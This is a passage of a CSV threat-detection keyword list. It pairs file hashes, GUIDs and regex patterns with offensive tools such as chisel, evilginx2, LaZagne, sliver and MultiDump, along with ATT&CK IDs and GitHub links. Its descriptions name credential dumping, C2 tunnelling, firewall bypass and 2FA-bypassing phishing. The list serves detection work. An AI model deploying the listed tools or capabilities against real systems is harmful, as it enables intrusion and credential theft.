TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7a40166148f77773238e3e5ad7572068d0b935303278f007c6c75dd3e9e302b3*",".{0,1000}7a40166148f77773238e3e5ad7572068d0b935303278f007c6c75dd3e9e302b3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7a51ed902fc804066c4617af21d0325cceebce588ca66709c697916ce5214e64*",".{0,1000}7a51ed902fc804066c4617af21d0325cceebce588ca66709c697916ce5214e64.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*7a6b32cadac1e4193540c181b169ce4e73dc69a5bb185b9e98842a4e4205cc81*",".{0,1000}7a6b32cadac1e4193540c181b169ce4e73dc69a5bb185b9e98842a4e4205cc81.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7a6baa66cbbfa32e37a003017e6a24ae5ba2764f39039a56d7556f2931824e49*",".{0,1000}7a6baa66cbbfa32e37a003017e6a24ae5ba2764f39039a56d7556f2931824e49.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*7a8cabbb37d569b2d9af56a4a11bb83dc5bb839c3d4a3ea05252e20e2d0c3a45*",".{0,1000}7a8cabbb37d569b2d9af56a4a11bb83dc5bb839c3d4a3ea05252e20e2d0c3a45.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","7","663","81","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" "*7a9a81c7ef99897281466ea06c14886335cf8d4c835f15aeb1e3a2c7c1d0e760*",".{0,1000}7a9a81c7ef99897281466ea06c14886335cf8d4c835f15aeb1e3a2c7c1d0e760.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*7aa369f9365c35abe1cfea6a209a8a6071d7af3377a357f94721860c02e4d332*",".{0,1000}7aa369f9365c35abe1cfea6a209a8a6071d7af3377a357f94721860c02e4d332.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*7aa6a3be25f05eb6a5c5cda7f10e48007dae601c9918a9734db3697ed6c63afc*",".{0,1000}7aa6a3be25f05eb6a5c5cda7f10e48007dae601c9918a9734db3697ed6c63afc.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" 
"*7aa90fa85c912e188d6c8d0668574285af14157c5d7b73e48d339d8a3f5dcf67*",".{0,1000}7aa90fa85c912e188d6c8d0668574285af14157c5d7b73e48d339d8a3f5dcf67.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7ac42abfb232c1b9f235969fcebf54bad0078e724552cdd89b5f32805b77a4ef*",".{0,1000}7ac42abfb232c1b9f235969fcebf54bad0078e724552cdd89b5f32805b77a4ef.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7acbf2c647d3fd9b61f6c3c8cdc8bcd3afd9f4dd1c2a95a3b30dde583b95ed22*",".{0,1000}7acbf2c647d3fd9b61f6c3c8cdc8bcd3afd9f4dd1c2a95a3b30dde583b95ed22.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7af0afcd0f9db86c97a7357aaaedd26ab3746e828d5c0febdd063099d0d3fee9*",".{0,1000}7af0afcd0f9db86c97a7357aaaedd26ab3746e828d5c0febdd063099d0d3fee9.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. 
It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "*7afe27385edf41f8365eed21b7f34467b574f2cb91f618ddcae75024f6403c41*",".{0,1000}7afe27385edf41f8365eed21b7f34467b574f2cb91f618ddcae75024f6403c41.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*7b05dd49119858395e365446d7168cc725a999d9d98b7ccabfafc3b5da7a6f74*",".{0,1000}7b05dd49119858395e365446d7168cc725a999d9d98b7ccabfafc3b5da7a6f74.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7b1aa993de7f49a7731c952cf3abedad501f45dc378e18b9b8245eaba78e72c5*",".{0,1000}7b1aa993de7f49a7731c952cf3abedad501f45dc378e18b9b8245eaba78e72c5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7b206d4ff0ebe922b4242b4821c84f9e5c05579fdc4c43033ae9a45f6494cac9*",".{0,1000}7b206d4ff0ebe922b4242b4821c84f9e5c05579fdc4c43033ae9a45f6494cac9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7b2ce8fed0da2a756ac78ee68f0885399ee5fa57e6a182e3b8fbffc1c523710d*",".{0,1000}7b2ce8fed0da2a756ac78ee68f0885399ee5fa57e6a182e3b8fbffc1c523710d.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*7B4D3810-4A77-44A1-8546-779ACF02D083*",".{0,1000}7B4D3810\-4A77\-44A1\-8546\-779ACF02D083.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*7b5930fe71b9746fe6fd52455d84ddbc740d1730be6028473ed501058f0f393d*",".{0,1000}7b5930fe71b9746fe6fd52455d84ddbc740d1730be6028473ed501058f0f393d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7b70c0af1d1d20eb090e2fad0afceef71e12b1083956dd7d58b181425478b764*",".{0,1000}7b70c0af1d1d20eb090e2fad0afceef71e12b1083956dd7d58b181425478b764.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7ba12c9d99dc22ef178a75886a1c843302e65906d7c15e4aed54066fbae41667*",".{0,1000}7ba12c9d99dc22ef178a75886a1c843302e65906d7c15e4aed54066fbae41667.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7bc64714fb90bddef226c04fb69f30d689384e3f0dfb89934c73ad1486e76e3a*",".{0,1000}7bc64714fb90bddef226c04fb69f30d689384e3f0dfb89934c73ad1486e76e3a.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","file_hash","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*7bc9e0e60db343690d6dcb61dd7f19c69fbd154234cbc38f7631f4a4a75fca8c*",".{0,1000}7bc9e0e60db343690d6dcb61dd7f19c69fbd154234cbc38f7631f4a4a75fca8c.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*7beae9c75c8e6e87a776f82461256a983e0fcd2ab169ea2293efa08f486ed33b*",".{0,1000}7beae9c75c8e6e87a776f82461256a983e0fcd2ab169ea2293efa08f486ed33b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" 
"*7becedb670137807e079f535c7bec03131414f90e8e2a70e4c989b9d9167f4aa*",".{0,1000}7becedb670137807e079f535c7bec03131414f90e8e2a70e4c989b9d9167f4aa.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*7bf796eca83019bad71db3ac9570b92d9f02ce7fa02d2891ef0116cb991fe022*",".{0,1000}7bf796eca83019bad71db3ac9570b92d9f02ce7fa02d2891ef0116cb991fe022.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*7c0e4bfa155808eba7c7c65fb62dcde013f4061437e1622f3fdbc255d85d38a1*",".{0,1000}7c0e4bfa155808eba7c7c65fb62dcde013f4061437e1622f3fdbc255d85d38a1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7C5C471B-9630-4DF5-A099-405D86553ECA*",".{0,1000}7C5C471B\-9630\-4DF5\-A099\-405D86553ECA.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*7C6D1CCD-D4DF-426A-B5D6-A6B5F13D0091*",".{0,1000}7C6D1CCD\-D4DF\-426A\-B5D6\-A6B5F13D0091.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*7c6f4b0023b62103aa803d4ddfe2736ed80f2911f7556ef16abc3be04674697b*",".{0,1000}7c6f4b0023b62103aa803d4ddfe2736ed80f2911f7556ef16abc3be04674697b.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*7c8c4d1e312218cb8a31c00d67f3b5e2e752d9e094e37c959e35e0483fc69109*",".{0,1000}7c8c4d1e312218cb8a31c00d67f3b5e2e752d9e094e37c959e35e0483fc69109.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","6","1","N/A","N/A","N/A","N/A" "*7c8dcea2da2cd78b706f7e08ff49f7733008ce357fba21777d17334abf0458a6*",".{0,1000}7c8dcea2da2cd78b706f7e08ff49f7733008ce357fba21777d17334abf0458a6.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*7c8dd8b38777d6701ea54b98193216b808e2c7cb560a7cf1c07ef9e6b134dc9e*",".{0,1000}7c8dd8b38777d6701ea54b98193216b808e2c7cb560a7cf1c07ef9e6b134dc9e.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 
- T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*7c9132c6c40c456396370d2e9cec4ee32b8cd289b29ccca946ea79f185eeaeed*",".{0,1000}7c9132c6c40c456396370d2e9cec4ee32b8cd289b29ccca946ea79f185eeaeed.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*7c935380a6f783ea10d0b8358d323f4238398320e1feada66ab08051be6982ed*",".{0,1000}7c935380a6f783ea10d0b8358d323f4238398320e1feada66ab08051be6982ed.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7c9a67abf328fddbc0cac8484a4f40f0c10e4b9b1cc3d4da6504df1303d7bdc0*",".{0,1000}7c9a67abf328fddbc0cac8484a4f40f0c10e4b9b1cc3d4da6504df1303d7bdc0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*7cb004e20f6509f08f6e7b33778f973378c8a8e3c8cc4530cacf1f02fee3c29a*",".{0,1000}7cb004e20f6509f08f6e7b33778f973378c8a8e3c8cc4530cacf1f02fee3c29a.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" 
"*7cc2ba97a45b159405891baba5ac216334e89d878a4efcdf47492c284cc6342e*",".{0,1000}7cc2ba97a45b159405891baba5ac216334e89d878a4efcdf47492c284cc6342e.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*7cda14dc04bb731f09880db6310c9d9d4ee96176931627f322ec725cde6bd18b*",".{0,1000}7cda14dc04bb731f09880db6310c9d9d4ee96176931627f322ec725cde6bd18b.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*7ce3b3c16cdaa2dfae51fbcf163ac75947127a9fd5e2d3c588480e3629345e8f*",".{0,1000}7ce3b3c16cdaa2dfae51fbcf163ac75947127a9fd5e2d3c588480e3629345e8f.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*7ce9ff1b4f75bf4289a2f1a1c33bef9719109712019989d28c14b51703b973fc*",".{0,1000}7ce9ff1b4f75bf4289a2f1a1c33bef9719109712019989d28c14b51703b973fc.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*7CEC7793-3E22-455B-9E88-94B8D1A8F78D*",".{0,1000}7CEC7793\-3E22\-455B\-9E88\-94B8D1A8F78D.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*7CFC52.dll*",".{0,1000}7CFC52\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*7CFC52CD3F.dll*",".{0,1000}7CFC52CD3F\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*7d2a12270debccf539db741714c724d3bf88d9814e3056533ba2c712c71b0ef3*",".{0,1000}7d2a12270debccf539db741714c724d3bf88d9814e3056533ba2c712c71b0ef3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*7d573a4e6b5f9864b7de3e769d2154d8a38119656b0900ab6e93f44f46ad2fbe*",".{0,1000}7d573a4e6b5f9864b7de3e769d2154d8a38119656b0900ab6e93f44f46ad2fbe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
